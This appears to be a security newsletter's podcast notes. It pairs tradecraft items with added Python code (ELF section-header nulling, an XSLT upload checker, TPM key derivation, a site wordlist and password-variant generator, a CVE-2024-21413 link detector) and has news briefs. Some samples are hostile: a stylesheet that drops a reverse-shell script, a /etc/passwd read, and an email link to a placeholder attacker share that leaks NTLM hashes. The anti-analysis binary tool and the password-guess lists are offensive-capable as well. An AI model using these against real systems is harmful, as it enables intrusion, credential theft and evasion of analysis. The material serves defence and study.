# Latest Podcast
# Description
Recent cybersecurity developments include NullSection, a tool that zeroes the section-header references in ELF binaries to hinder reverse engineering; a walkthrough of exploiting a recently disclosed remote code execution vulnerability in Splunk Enterprise with a malicious XSL stylesheet to obtain a reverse shell; Burp Suite's Sessionless extension for manipulating signed web tokens and simulating authorization attacks; guidelines for creating fake identities and secure work environments for OSINT; Echotrail's profiles of common Windows processes (for example runtimebroker.exe, which manages permissions for Microsoft Store apps); The ThreatHunting Project, a resource for threat hunting techniques; The Vergilius Project's reconstruction of undocumented Windows kernel structures; vulnerabilities in discrete TPMs used for attestation and disk encryption; an exploit for Microsoft Outlook (CVE-2024-21413) that leaks NTLM password hashes; and the WEB-Wordlist-Generator for building target-specific wordlists from a web application's own content.
# Tradecraft
[#]
NullSection is a tool that nullifies the section header table of an ELF binary, zeroing the ELF header fields that locate it, so that `readelf -S` reports "There are no sections in this file" and Ghidra or IDA lose the section and symbol information they use to find and name functions. The loader only needs the program headers, so the binary still runs. The technique hides metadata rather than removing code: an analyst can still carve functions from the loadable segments, so it raises the cost of analysis without preventing it.
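The core of that technique, as an added example (my own Python, not NullSection's code): the ELF header's e_shoff, e_shentsize, e_shnum and e_shstrndx fields are zeroed so nothing points at the section header table, while e_phoff and the program headers are left intact so the binary still loads. The sample ELF headers built by `build_sample_elf` are constructed for the demonstration and are not real binaries.

```python
import struct
import sys

# Byte offsets of the section-header fields inside the ELF header, by EI_CLASS:
# (offset of e_shoff, its pack code, offset of e_shentsize/e_shnum/e_shstrndx)
_LAYOUT = {1: (0x20, "I", 0x2E),   # ELFCLASS32
           2: (0x28, "Q", 0x3A)}   # ELFCLASS64


def _layout(data: bytes):
    if data[:4] != b"\x7fELF" or len(data) < 52:
        raise ValueError("not an ELF file")
    endian = {1: "<", 2: ">"}[data[5]]                 # EI_DATA: 1 = LE, 2 = BE
    shoff_at, shoff_fmt, shent_at = _LAYOUT[data[4]]   # EI_CLASS
    return endian, shoff_at, shoff_fmt, shent_at


def section_info(data: bytes):
    """Return (e_shoff, e_shentsize, e_shnum, e_shstrndx) from the ELF header."""
    endian, shoff_at, shoff_fmt, shent_at = _layout(data)
    (shoff,) = struct.unpack_from(endian + shoff_fmt, data, shoff_at)
    shentsize, shnum, shstrndx = struct.unpack_from(endian + "HHH", data, shent_at)
    return shoff, shentsize, shnum, shstrndx


def null_section_headers(data: bytes) -> bytes:
    """Zero every header field that locates the section header table.

    Only the references are cleared: the program headers (what the loader
    uses) and the rest of the file are untouched, so the binary still runs
    and readelf -S reports "There are no sections in this file".
    """
    endian, shoff_at, shoff_fmt, shent_at = _layout(data)
    out = bytearray(data)
    struct.pack_into(endian + shoff_fmt, out, shoff_at, 0)      # e_shoff = 0
    struct.pack_into(endian + "HHH", out, shent_at, 0, 0, 0)    # e_shentsize/e_shnum/e_shstrndx = 0
    return bytes(out)


def build_sample_elf(bits: int = 64) -> bytes:
    """Constructed ELF header plus one zeroed program header (not a real binary)."""
    if bits == 64:
        ei_class, fmt, ehsize, phentsize, shentsize, machine = 2, "<HHIQQQIHHHHHH", 64, 56, 64, 0x3E
    else:
        ei_class, fmt, ehsize, phentsize, shentsize, machine = 1, "<HHIIIIIHHHHHH", 52, 32, 40, 0x03
    e_ident = b"\x7fELF" + bytes([ei_class, 1, 1, 0]) + b"\x00" * 8   # class, little-endian, v1
    header = struct.pack(fmt,
                         2, machine, 1,            # e_type=ET_EXEC, e_machine, e_version
                         0x401000,                 # e_entry
                         ehsize,                   # e_phoff: program headers follow the header
                         0x1234,                   # e_shoff: pretend the section table lives here
                         0, ehsize, phentsize, 1,  # e_flags, e_ehsize, e_phentsize, e_phnum
                         shentsize, 5, 4)          # e_shentsize, e_shnum, e_shstrndx
    return e_ident + header + b"\x00" * phentsize


if __name__ == "__main__":
    # usage: python nullsection_demo.py <in-elf> <out-elf>
    with open(sys.argv[1], "rb") as f:
        patched = null_section_headers(f.read())
    with open(sys.argv[2], "wb") as f:
        f.write(patched)
```

Run `readelf -S` on the output to confirm the "no sections" message, and `readelf -l` to confirm the program headers are intact.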
[#]
A security researcher has detailed their process for exploiting a recently disclosed remote code execution vulnerability in Splunk Enterprise: writing a malicious XSL stylesheet, finding a path to upload it, satisfying the requirements of the endpoint that processes it, and then executing the dropped reverse shell script.
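Since the chain starts with a stylesheet the application is willing to process, the practical defence is to refuse stylesheets that can write files, load external resources or call code-execution extension functions before they reach the XSLT engine. The following is an added example of such a pre-processing check (my own Python, not from the write-up or from Splunk); the three stylesheets are constructed for the demonstration and the file path in the malicious one is a placeholder.

```python
import re
import xml.etree.ElementTree as ET

XSL_NS = "http://www.w3.org/1999/XSL/Transform"
EXSLT_COMMON_NS = "http://exslt.org/common"
# Namespace URIs (or URI prefixes) that bind extension functions able to run
# code or touch the filesystem in common processors.
CODE_EXTENSION_NS = (
    "http://xml.apache.org/xalan/java",   # Xalan-J Java bridge
    "java:",                              # java: scheme used by Xalan/Saxon
    "http://php.net/xsl",                 # PHP registerPHPFunctions()
    "http://saxon.sf.net/",               # Saxon extension functions
)
# Attributes holding XPath or a URI where document()/unparsed-text() can appear.
XPATH_ATTRS = ("select", "test", "match", "use", "href")


def _split_tag(tag: str):
    """'{ns}local' -> (ns, local); 'local' -> ('', local)."""
    if tag.startswith("{"):
        ns, _, local = tag[1:].partition("}")
        return ns, local
    return "", tag


def flag_unsafe_xslt(xsl_text: str) -> list:
    """Return the reasons an uploaded stylesheet should be rejected ([] = clean)."""
    findings = []
    if re.search(r"<!DOCTYPE", xsl_text, re.IGNORECASE):
        findings.append("DOCTYPE declaration present (entity expansion / XXE)")
    for prefix, uri in re.findall(r'xmlns:([\w.-]+)="([^"]*)"', xsl_text):
        if uri.startswith(CODE_EXTENSION_NS):
            findings.append("code-execution extension namespace %s=%s" % (prefix, uri))
    root = ET.fromstring(xsl_text)
    for el in root.iter():
        if not isinstance(el.tag, str):      # comments / processing instructions
            continue
        ns, local = _split_tag(el.tag)
        if ns == EXSLT_COMMON_NS and local == "document":
            findings.append("exsl:document writes a file on the server: %r" % el.get("href"))
        if ns == XSL_NS and local in ("include", "import"):
            findings.append("xsl:%s loads an external stylesheet: %r" % (local, el.get("href")))
        for attr in XPATH_ATTRS:
            expr = el.get(attr, "")
            if re.search(r"\b(document|unparsed-text)\s*\(", expr):
                findings.append("%s %s=%r reads arbitrary files or URLs" % (local, attr, expr))
    return findings


# Constructed samples for the demonstration.
MALICIOUS_XSL = """<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:exsl="http://exslt.org/common" extension-element-prefixes="exsl">
  <xsl:template match="/">
    <exsl:document href="/opt/app/bin/rev.sh" method="text">
      <xsl:text>#!/bin/sh
# (reverse shell body would go here)
</xsl:text>
    </exsl:document>
  </xsl:template>
</xsl:stylesheet>"""

READ_FILE_XSL = """<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/"><xsl:copy-of select="document('/etc/passwd')"/></xsl:template>
</xsl:stylesheet>"""

BENIGN_XSL = """<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/"><h1><xsl:value-of select="/report/title"/></h1></xsl:template>
</xsl:stylesheet>"""
```

This check is a first layer only; the processor itself should also be configured to deny file and network access (for example lxml's `XSLTAccessControl.DENY_ALL`), since a rejected-by-pattern list can always be incomplete.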
[#]
Echotrail profiles common Windows processes so analysts can judge what is normal on a host. Its entry for runtimebroker.exe, for example, records a legitimate Windows process that manages permissions for Microsoft Store apps, is present on Windows 8 and newer, and shows high prevalence and execution frequency across observed hosts, which is what makes a RuntimeBroker.exe running from an unusual path or parent stand out.
[#]
The Vergilius Project is a resource offering detailed information on undocumented Microsoft Windows kernel structures, reconstructed as C/C++ declarations by parsing Microsoft's public PDB symbol files, aimed at driver developers and kernel researchers.
[#]
This article examines vulnerabilities in TPMs used for attestation and full-disk encryption. It shows that a discrete TPM can be defeated in software on systems with outdated firmware, or by simple hardware manipulation of the separate chip, so that a disk-encryption key released by the TPM alone is exposed to an attacker with physical access. It recommends combining the TPM-released secret with an interactive user secret and unique per-install values, so that neither a captured TPM value nor a cloned disk image yields the key on its own.
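One way to apply that recommendation, as an added example (my own Python, not the article's code): the volume key is derived from three inputs, the value the TPM releases only when the measured boot state matches, a PIN the user types at boot, and a random per-install salt stored with the volume metadata. A captured TPM value alone, or a cloned disk, is then not enough. The key size, iteration count, labels and the sample TPM value are choices made for the example.

```python
import hashlib
import hmac
import os


def hkdf_sha256(ikm: bytes, salt: bytes, info: bytes, length: int = 32) -> bytes:
    """HKDF (RFC 5869) extract-then-expand with HMAC-SHA256."""
    prk = hmac.new(salt, ikm, hashlib.sha256).digest()
    okm, block = b"", b""
    for counter in range(1, -(-length // 32) + 1):      # ceil(length / 32) blocks
        block = hmac.new(prk, block + info + bytes([counter]), hashlib.sha256).digest()
        okm += block
    return okm[:length]


def derive_volume_key(tpm_released: bytes, user_pin: str, install_salt: bytes,
                      pin_iterations: int = 100_000) -> bytes:
    """Combine the three secrets into the 256-bit volume key.

    tpm_released : value unsealed by the TPM against the boot-state PCRs
    user_pin     : interactive secret, never present on the TPM bus or on disk
    install_salt : random per-install value, so two machines with identical
                   firmware, TPM state and PIN still get different keys
    """
    # Stretch the low-entropy PIN so that an attacker holding tpm_released and
    # install_salt still pays the full cost for every PIN guess.
    pin_key = hashlib.pbkdf2_hmac("sha256", user_pin.encode("utf-8"),
                                  install_salt, pin_iterations, dklen=32)
    return hkdf_sha256(ikm=tpm_released + pin_key, salt=install_salt,
                       info=b"fde-volume-key-v1", length=32)


def new_install_salt() -> bytes:
    """Generated once at install time and stored alongside the volume header."""
    return os.urandom(32)


# Constructed values for the demonstration; a real TPM returns tpm_released
# only when the PCRs match the policy the value was sealed under.
TPM_RELEASED = bytes.fromhex("a1" * 32)
INSTALL_SALT = bytes.fromhex("5a" * 32)
```

The order matters for the threat model in the article: the TPM value still binds the key to the measured boot state, the PIN is the part no bus sniffer sees, and the salt prevents a sealed value recovered from one machine from being replayed against an identical image on another.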
[#]
An exploit for Microsoft Outlook, tracked as CVE-2024-21413, leaks the victim's NTLM password hash when a crafted link in a message is followed (the write-up's proof of concept links an Expect script); it can be chained with CVE-2023-21716 for remote code execution, and the fix is the one listed in Microsoft's update guide entry for the CVE.
[#]
The WEB-Wordlist-Generator is a tool that scans a web application and builds a wordlist from its own content, so that defenders can test content discovery and password policies against terms specific to the target rather than generic lists.
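To show what such a generator does, here is an added example (my own Python, not the tool's code) that extracts candidate words from a page's visible text, link paths and form field names, skips script and style bodies, ranks them by frequency, and derives the password-style variants an audit would try. The HTML page is constructed for the demonstration.

```python
import re
from html.parser import HTMLParser

# Attribute values that tend to carry endpoint, parameter and field names.
NAME_ATTRS = ("id", "name", "class", "href", "action")


class _WordSource(HTMLParser):
    """Collect visible text plus selected attribute values; ignore script/style."""

    def __init__(self):
        super().__init__()
        self.chunks = []
        self._skip_depth = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip_depth += 1
        for name, value in attrs:
            if name in NAME_ATTRS and value:
                self.chunks.append(value)

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip_depth:
            self._skip_depth -= 1

    def handle_data(self, data):
        if not self._skip_depth:
            self.chunks.append(data)


def generate_wordlist(html: str, min_len: int = 4, max_len: int = 24) -> list:
    """Unique lower-cased words from the page, most frequent first, then alphabetical."""
    parser = _WordSource()
    parser.feed(html)
    counts = {}
    for chunk in parser.chunks:
        for token in re.findall(r"[A-Za-z][A-Za-z0-9_-]*", chunk):
            if min_len <= len(token) <= max_len:
                word = token.lower()
                counts[word] = counts.get(word, 0) + 1
    return sorted(counts, key=lambda w: (-counts[w], w))


def password_variants(words, years=(2023, 2024)) -> list:
    """Password-audit candidates built from the site's own vocabulary."""
    out = []
    for w in words:
        out.extend([w, w.capitalize(), w.upper()])
        for y in years:
            out.extend([f"{w.capitalize()}{y}", f"{w.capitalize()}{y}!", f"{w}@{y}"])
    return out


# Constructed sample page for the demonstration.
SAMPLE_HTML = """<html><head><title>Acme Widgets - Customer Portal</title>
<style>.hidden { display:none }</style>
<script>var secretjsvar = 1;</script></head>
<body class="portal-page">
<h1>Welcome to Acme Widgets</h1>
<form action="/account/login" method="post">
  <input name="username"><input name="password" type="password">
</form>
<a href="/admin/backup.php">Acme admin tools</a>
<p>Contact support@acme.example for help with your Acme account.</p>
</body></html>"""
```

Feed `generate_wordlist` the bodies of every page a crawl reaches; the result doubles as a directory and parameter list for content discovery and, through `password_variants`, as a targeted dictionary for auditing weak passwords built from the organisation's own names.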
# News
[#]
The Enea report details an "MMS Fingerprint" technique attributed to NSO Group, surfaced in filings from WhatsApp's lawsuit against the company, that collects a target's device and OS information via MMS without user interaction, which underscores the need for continuous security work in messaging platforms.
[#]
The U.S. Cybersecurity and Infrastructure Security Agency has added CVE-2020-3259, a 2020 memory-disclosure vulnerability in Cisco ASA/FTD, to its Known Exploited Vulnerabilities catalog after reports that Akira ransomware is actively exploiting it; federal agencies must patch it by March 7, 2024.
[#]
U.S. federal authorities dismantled a Russian GRU-controlled botnet of more than a thousand routers infected with the Moobot malware and used for espionage, and recommended that owners factory-reset and secure their devices to prevent reinfection.
[#]
Security researchers have discovered a potential surveillance technique called 'MMS Fingerprint,' used to silently obtain device and operating system information via MMS without user interaction, which could aid attackers in crafting targeted exploits.
[#]
Researchers at SentinelOne have identified a new smishing tool named SNS Sender that is designed to use Amazon Simple Notification Service for sending bulk fraudulent UPS "failed delivery" messages, potentially containing phishing links that harvest personal information.
[#]
A U.S. cyberattack was carried out against the Iranian military ship MV Behshad to disrupt its intelligence gathering in support of Houthi attacks on Red Sea shipping.
[#]
The Lazarus hacker group from North Korea is now utilizing the YoMix bitcoin mixer to launder large amounts of stolen cryptocurrency despite sanctions on similar services, with reports showing a significant increase in funds processed by the mixer linked to crypto thefts.
[#]
Cryptocurrency firms are being targeted by a macOS malware campaign using a backdoor named RustDoor, which is spread through fake Visual Studio updates and job offers to senior engineering staff, with Bitdefender's research suggesting at least three companies have been compromised.
[#]
Two U.S. cab drivers, Daniel Abayev and Peter Leyman, were sentenced to prison for conspiring with two Russian nationals to hack the JFK airport taxi dispatch system and move the taxis of drivers who paid them to the front of the queue; each must pay $160,000 in forfeiture and nearly $3.5 million in restitution.
[#]
Security flaws CVE-2024-23476 and CVE-2024-23479 allow attackers pre-authentication remote code execution on SolarWinds ARM, and an urgent update to version 2023.2.3 is required to mitigate this critical risk.
[#]
Proofpoint researchers have detected an ongoing Azure ATO campaign targeting top-tier organizational roles for infiltration and fraud, utilizing techniques like personalized phishing, MFA manipulations, and internal email abuse, with potential links to Russian and Nigerian cyber actors.
[#]
Infosys McCamish Systems, an Infosys subsidiary, reported a cyber security incident leading to a data breach at Bank of America, compromising personal information of 57,028 individuals, and LockBit ransomware is suspected to be involved.
[#]
In a severe security breach, 23andMe confirmed a hacker obtained access to personal data, including ethnicity estimates and relative connections, from 6.9 million user accounts; the company has since implemented mandatory two-step verification.
[#]
The FBI has labeled Volt Typhoon, a Chinese cyber operation pre-positioning dormant access inside critical US infrastructure, a major security concern, prompting joint efforts between US agencies and the private technology sector on defensive action and remediation.
[#]
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) reported a breach of a state government organization's network by exploiting a former employee's VPN credentials, highlighting the need for multifactor authentication and regular review of account access rights.
[#]
A proof-of-concept exploit for a critical remote code execution vulnerability in Microsoft Outlook, designated CVE-2024-21413 with a CVSS score of 9.8, has been released, prompting users to apply the February 2024 Patch Tuesday updates to mitigate the risk of attack.
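As an added example for both the Tradecraft item on CVE-2024-21413 and this advisory (my own Python, not the published proof of concept), the following scans a message's HTML body for the link shape that triggers the bug: a `file://` hyperlink to a remote share whose target carries a `!` suffix, which is what stops Outlook from treating the share as untrusted and lets the outbound SMB connection leak the user's NTLM hash. Plain UNC links without the `!` are reported at lower severity, since Outlook still warns before following them. The message body is constructed for the demonstration and 203.0.113.10 is a documentation-range placeholder for the attacker's share.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote


class _HrefCollector(HTMLParser):
    """Gather every <a href> value in a message body."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "a":
            for name, value in attrs:
                if name.lower() == "href" and value:
                    self.hrefs.append(value)


def classify_file_link(href: str):
    """Return 'moniker-bypass', 'unc-link' or None for one href."""
    h = unquote(href.strip())                 # undo %5C / %21 style encoding
    if not h.lower().startswith("file:"):
        return None
    # file:///\\host\share\doc.rtf!x  ->  host/share/doc.rtf!x
    path = h[5:].replace("\\", "/").lstrip("/")
    host = path.split("/", 1)[0]
    if host == "" or re.fullmatch(r"[A-Za-z]:", host):
        return None                           # local drive path, not an SMB share
    return "moniker-bypass" if "!" in path else "unc-link"


def find_moniker_links(html: str) -> list:
    """(href, verdict) for every file:// link to a remote share in the body."""
    collector = _HrefCollector()
    collector.feed(html)
    hits = []
    for href in collector.hrefs:
        verdict = classify_file_link(href)
        if verdict:
            hits.append((href, verdict))
    return hits


# Constructed message body for the demonstration.
SAMPLE_BODY = """<html><body>
<p>Please review the attached invoice:</p>
<a href="file:///\\\\203.0.113.10\\share\\invoice.rtf!2024">invoice.rtf</a><br>
<a href="file://203.0.113.10/share/readme.txt">readme</a><br>
<a href="file:///C:/Users/Public/local.rtf">local copy</a><br>
<a href="https://example.com/portal">portal</a>
</body></html>"""
```

This only covers HTML bodies; messages whose body is RTF need the same check applied to the RTF `HYPERLINK` fields, and the detection complements rather than replaces the February 2024 patch and egress filtering of outbound SMB (TCP 445).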
[#]
QNAP network-attached storage devices are vulnerable to two command injection flaws, CVE-2023-50358 and CVE-2023-47218, necessitating immediate patching as per new advisories to prevent potential major damages.
[#]
Cybercriminals exploiting iOS and Android with new malware, named GoldPickaxe and its iterations, are compromising biometric data and personal information to facilitate bank fraud, highlighting the need for improved cybersecurity measures and user vigilance.
[#]
The European Court of Human Rights has ruled (in Podchasov v. Russia) that government-mandated backdoors to decrypt end-to-end encrypted messages violate the right to privacy, emphasizing the importance of privacy and security for all users of communications technology.
[#]
Microsoft and Adobe released multiple security patches addressing vulnerabilities that could allow for remote code execution, security feature bypass, and denial-of-service attacks, with Microsoft highlighting urgent fixes for three Windows exploits and Adobe patching flaws across various products.
[#]
Canada aims to ban the Flipper Zero device, a tool popular among security professionals for testing vulnerabilities, due to unfounded claims that it contributes to car thefts, yet experts argue this could harm cyber defense by hindering research into security system flaws.
[#]
A severe vulnerability in Mastodon (CVE-2024-23832) allowing user impersonation has been patched; administrators should update to versions 3.5.17, 4.0.13, 4.1.13, or newer to protect against potential account takeovers.
[#]
The U.S. government has neutralized a botnet controlled by the Russian-linked APT28 group, known for cyber espionage, by commandeering the SOHO routers the group used to mask its activity and stage data theft.
[#]
The US government disrupted a Russian GRU-operated botnet by removing the malware from over a thousand compromised routers and adding firewall rules that block further remote access, and advised owners to change default passwords after a factory reset to prevent re-infection.
[#]
Ukrainian national Vyacheslav Igorevich Penchukov, alias 'tank', admits guilt for leading Zeus and IcedID malware operations and faces a maximum combined sentence of 40 years after extradition to the U.S.
[#]
A Malwarebytes Labs investigation has revealed a surge in fraudulent Google ads for utility savings, which lure users via phone calls and geolocation targeting, often operated from Pakistan, with the intent to intimidate and scam victims, and the best defense is to avoid clicking on these search ads.
[#]
Microsoft's recent updates aimed at fixing connection issues with the Windows Metadata service did not resolve the problem, causing continued delays in hardware management for end users and system administrators.
[#]
Quest Diagnostics has agreed to a $5 million settlement for allegations of mishandling protected health information and hazardous waste disposal in California, taking corrective action by hiring an independent environmental auditor and revising waste-management practices.
[#]
Google has released Magika, an open-source AI-powered tool that quickly and precisely identifies file types, surpassing traditional methods by leveraging a deep-learning model for better safety and efficiency in handling and scanning files.